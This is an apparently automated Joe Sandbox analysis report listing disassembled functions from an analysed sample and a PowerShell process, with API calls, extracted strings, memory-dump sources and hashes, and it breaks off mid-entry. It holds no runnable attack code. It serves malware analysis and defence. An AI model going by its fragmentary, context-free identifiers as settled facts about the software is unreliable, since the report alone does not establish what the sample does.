                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: 0k'I$0l'I$0m'I$0n'I$0o'I$Pk'I$Pl'I$Pm'I$Pn'I$Po'I$pk'I$pl'I$pm'I$pn'I$po'I
                                                                                                                                                                                                                                                                    • API String ID: 0-2867377825
                                                                                                                                                                                                                                                                    • Opcode ID: 3d126f7fa9ce513cc4d09f7d1cdc6c42c1729dad3018c945eb444cfd1f46e66d
                                                                                                                                                                                                                                                                    • Instruction ID: b97b38503198c2a8bd3f60bd028444565884d06c0cbee4eae86393510b3d8b35
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d126f7fa9ce513cc4d09f7d1cdc6c42c1729dad3018c945eb444cfd1f46e66d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6171F523E1EEC24FF15976687D242796AA5FB61B90BA900FFC148570CFE9309E0553CA
                                                                                                                                                                                                                                                                    Function 00007FF848F19E80 Relevance: 5.2, Strings: 4, Instructions: 226COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000013.00000002.2601994375.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: 07'I$09'I$P7'I$P9'I
                                                                                                                                                                                                                                                                    • API String ID: 0-4035757597
                                                                                                                                                                                                                                                                    • Opcode ID: 3cf713465e82b49faac1a442c4bf7486a4fd3d0c297bfe2c38131296d9ed614f
                                                                                                                                                                                                                                                                    • Instruction ID: 1f840fcaf57f25d5896108f61fbd7b9f60fe43bc29bb72c7e69a4fd8df527dc8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cf713465e82b49faac1a442c4bf7486a4fd3d0c297bfe2c38131296d9ed614f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C61C362E1EAC25FE25A57782C191357FA1EF52B90F4801FFC0C84B4DF95599C8983C6
                                                                                                                                                                                                                                                                    Function 00007FF848F1A20F Relevance: 5.2, Strings: 4, Instructions: 176COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000013.00000002.2601994375.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: P+'I$P,'I$p+'I$p,'I
                                                                                                                                                                                                                                                                    • API String ID: 0-2677377969
                                                                                                                                                                                                                                                                    • Opcode ID: 874a5a96f632d477b4700935c67af76d66af3ad46147f20a0fd4826ae02eca8d
                                                                                                                                                                                                                                                                    • Instruction ID: 13ca4f53b5ff2733f9bc264263e7d0788d368774ebe49c52d65e9420369a66fa
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 874a5a96f632d477b4700935c67af76d66af3ad46147f20a0fd4826ae02eca8d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1251FA22D0EBD24FE357A77828151757FA0EF22B90F5902FFC0884B0DBE9195D958396
                                                                                                                                                                                                                                                                    Function 00007FF848F1A248 Relevance: 5.2, Strings: 4, Instructions: 153COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000013.00000002.2601994375.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: P+'I$P,'I$p+'I$p,'I
                                                                                                                                                                                                                                                                    • API String ID: 0-2677377969
                                                                                                                                                                                                                                                                    • Opcode ID: 2cde131044573fcc0adf82eee83319c98a6b6386321c5e27a3caa94c8aa61f36
                                                                                                                                                                                                                                                                    • Instruction ID: 83b03f966cae808d13307c27560812ef5531f1171e55a393a6c3e84c39acceaa
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cde131044573fcc0adf82eee83319c98a6b6386321c5e27a3caa94c8aa61f36
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35411B22D0EBC24FF356977828151357FA0FF62B90F5901FFC0885B0DBA9195D958396

                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                    Function 004149D0 Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 569COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • PathRemoveFileSpecW.SHLWAPI(00000000,00000001,?,004AF2A8,00000001), ref: 00414C52
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(004AF2AC,00000002,00000001,?,004AF2A8,00000001), ref: 00414C65
                                                                                                                                                                                                                                                                      • Part of subcall function 004151D0: CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 004151DB
                                                                                                                                                                                                                                                                      • Part of subcall function 004151D0: DestroyEnvironmentBlock.USERENV(00000000,?,00414C7F,?), ref: 004151E9
                                                                                                                                                                                                                                                                      • Part of subcall function 004151D0: CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 004151F7
                                                                                                                                                                                                                                                                      • Part of subcall function 004151D0: CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 00415205
                                                                                                                                                                                                                                                                      • Part of subcall function 004151D0: CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 00415212
                                                                                                                                                                                                                                                                      • Part of subcall function 004151D0: CloseHandle.KERNEL32(?,?,00414C7F,?), ref: 00415226
                                                                                                                                                                                                                                                                      • Part of subcall function 004151D0: CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 0041523F
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandle$BlockDestroyEnvironmentErrorFileLastPathRemoveSpec
                                                                                                                                                                                                                                                                    • String ID: D$In ProcessUtils::utilCreateProcessInUserSessionWithReturnCode.$In ProcessUtils::utilCreateProcessInUserSessionWithReturnCode. Error in createProcessInUserSession with error %d.$In ProcessUtils::utilCreateProcessInUserSessionWithReturnCode. Error in utilRemoveFileSpec in currentDirectory %s $In ProcessUtils::utilCreateProcessInUserSessionWithReturnCode. Return$In ProcessUtils::utilCreateProcessInUserSessionWithReturnCode. WaitForFinish is false. Returning$OOBEUtils$ProcessUtils
                                                                                                                                                                                                                                                                    • API String ID: 2934398582-495172292
                                                                                                                                                                                                                                                                    • Opcode ID: b1d8b08e1ced0472de58a44bdc32ac5145ca0abbc8f526ddc3a30321f6e8c4e6
                                                                                                                                                                                                                                                                    • Instruction ID: 44ddc1e84410081819ab0d6c29ceb37a1c44936693579239e334559e60437c79
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1d8b08e1ced0472de58a44bdc32ac5145ca0abbc8f526ddc3a30321f6e8c4e6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C422C130A40219DBDB10DF54CD5ABEE77B4BF95704F2401AAE80577290DBB86E90CFA9
                                                                                                                                                                                                                                                                    Function 004029A0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 247COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: AdobeUpdateService$AdobeUpdateService: Process certificate didnt match to Adobe certificate!$main: Finished$main: Started
                                                                                                                                                                                                                                                                    • API String ID: 0-108484121
                                                                                                                                                                                                                                                                    • Opcode ID: b3500d050bb6cdf61eb27a6f39655ff4180bc88b106c65d246eddb0ba753381a
                                                                                                                                                                                                                                                                    • Instruction ID: aa4f7462551908f85693e87270aad57e37dee6bb7c79447cbb64f1a26d33a99d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3500d050bb6cdf61eb27a6f39655ff4180bc88b106c65d246eddb0ba753381a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D491F870A002189FEB14DF65CD5ABAE7BB4EB04718F14417EE405B73C1EBB86A05CB99
                                                                                                                                                                                                                                                                    Function 0046A3FC Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0046A40E
                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0046A41D
                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0046A426
                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0046A433
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                    • Opcode ID: ac1283240fa4666ab2caaaff0c877bff52670fbfcb2ac06dcdcff882bb556bcf
                                                                                                                                                                                                                                                                    • Instruction ID: e4e9c80c65a6a08ef3cfff89654f3def58ef4d81fe7765c738179de465d37d3f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac1283240fa4666ab2caaaff0c877bff52670fbfcb2ac06dcdcff882bb556bcf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50F05F71C10209EBCB04DBB5DA49A9EBBF8EF28305F5148A69412E7150E774AB049F55
                                                                                                                                                                                                                                                                    Function 00479425 Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0047951D
                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00479527
                                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00479534
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                    • Opcode ID: a19f73a4d9f4d0e54a9ed4dae2ef3fd1af3dc1133b3d865888961f1c74766716
                                                                                                                                                                                                                                                                    • Instruction ID: 7109313c7fa8fd350fdfa9001e6c8f204caf35ef787ef4bb10a63f32fd68b71d
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a19f73a4d9f4d0e54a9ed4dae2ef3fd1af3dc1133b3d865888961f1c74766716
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB31D87590122CABCB21DF65DD88BCDBBB8BF18310F5041EAE40CA6251E7749F858F49
                                                                                                                                                                                                                                                                    Function 00460FA0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 92b4408d911e923283ad052d3412a50f4253902d7f48253863d126fe0516623a
                                                                                                                                                                                                                                                                    • Instruction ID: ab5e05bcc99bfceca36f26a0eb8b1f4f863e45577806241823cb0e5dbccfed84
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92b4408d911e923283ad052d3412a50f4253902d7f48253863d126fe0516623a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE01ECB5904719EBCB14CF99D941B9AFBF4FB48720F20862AE429A3790D33565108F94
                                                                                                                                                                                                                                                                    Function 0041F500 Relevance: 30.4, APIs: 11, Strings: 9, Instructions: 396sleepCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
